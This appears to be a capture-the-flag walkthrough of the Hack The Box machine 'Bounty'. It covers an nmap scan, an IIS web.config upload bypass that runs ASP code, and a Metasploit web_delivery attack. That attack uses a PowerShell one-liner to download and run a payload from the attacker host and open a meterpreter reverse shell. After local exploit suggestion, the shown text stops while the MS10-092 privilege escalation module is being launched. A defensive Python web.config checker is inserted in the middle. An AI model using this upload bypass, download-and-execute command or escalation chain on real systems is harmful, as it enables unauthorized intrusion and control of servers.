$ nmap -A 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST
Nmap scan report for 10.10.10.93
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012(92%)
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
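As an added defensive example (not part of the original writeup), the following Python check flags an uploaded web.config that reconfigures IIS the way the file above does: a handler mapping *.config to a script processor, a Write plus Script accessPolicy, removal of the .config and web.config request-filtering entries, and embedded ASP delimiters. Both sample inputs are constructed for this example.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the upload-bypass web.config shown above (attributes
# re-spaced), followed by ASP code inside an XML comment.
MALICIOUS_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule"
 scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified"
 requireAccess="Write" preCondition="bitness64"/></handlers>
<security><requestFiltering>
<fileExtensions><remove fileExtension=".config"/></fileExtensions>
<hiddenSegments><remove segment="web.config"/></hiddenSegments>
</requestFiltering></security></system.webServer></configuration>
<!-- <% Response.write(1+2) %> -->"""

# Constructed sample: a harmless web.config that only sets a default document.
BENIGN_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><defaultDocument>
<files><add value="index.html"/></files>
</defaultDocument></system.webServer></configuration>"""


def audit_web_config(text: str) -> list:
    """Return findings for an uploaded web.config; an empty list means none."""
    findings = []
    # ASP delimiters have no business in a configuration file, even in a comment.
    if "<%" in text:
        findings.append("contains ASP script delimiters")
    try:
        root = ET.fromstring(text.strip())
    except ET.ParseError as exc:
        # IIS may still accept it, so a parse failure is itself a finding.
        return findings + [f"not well-formed XML: {exc}"]
    for handlers in root.iter("handlers"):
        policy = (handlers.get("accessPolicy") or "").lower()
        if "write" in policy and "script" in policy:
            findings.append("handlers accessPolicy combines Write with Script")
        for add in handlers.findall("add"):
            path = (add.get("path") or "").lower()
            if path.endswith(".config") and add.get("scriptProcessor"):
                findings.append(f"handler maps {path} to {add.get('scriptProcessor')}")
    # Request filtering normally blocks .config files and hides web.config;
    # a <remove> of either entry undoes that protection.
    for rm in root.iter("remove"):
        if (rm.get("fileExtension") or "").lower() == ".config":
            findings.append("removes .config from blocked fileExtensions")
        if (rm.get("segment") or "").lower() == "web.config":
            findings.append("removes web.config from hiddenSegments")
    return findings
```

Running the check before an upload is stored, rather than relying on the server-wide request-filtering defaults, catches the bypass regardless of which extension the upload form allows.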
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set SRVHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > set SRVPORT 80
msf5 exploit(multi/script/web_delivery) > set LHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.16:4444
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://10.10.14.16:80/yXwrLG55ZN
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring('http://10.10.14.16/yXwrLG55ZN');
[*] 10.10.10.93 web_delivery - Delivering Payload (2125) bytes
[*] Sending stage (206403 bytes) to 10.10.10.93
msf5 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Microsoft Windows [Version 6.1.7600]
The MSF web_delivery module generates the PowerShell one-liner above; running it on the target gives the reverse shell.
Local vulnerability enumeration
C:\windows\system32\inetsrv>exit
exit
meterpreter > background
msf5 exploit(multi/script/web_delivery) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
The suggester reports the candidate local exploits above.
Searching for the exploit
msf5 post(multi/recon/local_exploit_suggester) > search ms10_092

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/windows/local/ms10_092_schelevator  2010-09-13       excellent  Yes    Windows Escalate Task Scheduler XML Privilege Escalation
Exploitation
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set session 1
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.16
msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 4443
LPORT => 4443
msf5 exploit(windows/local/ms10_092_schelevator) > run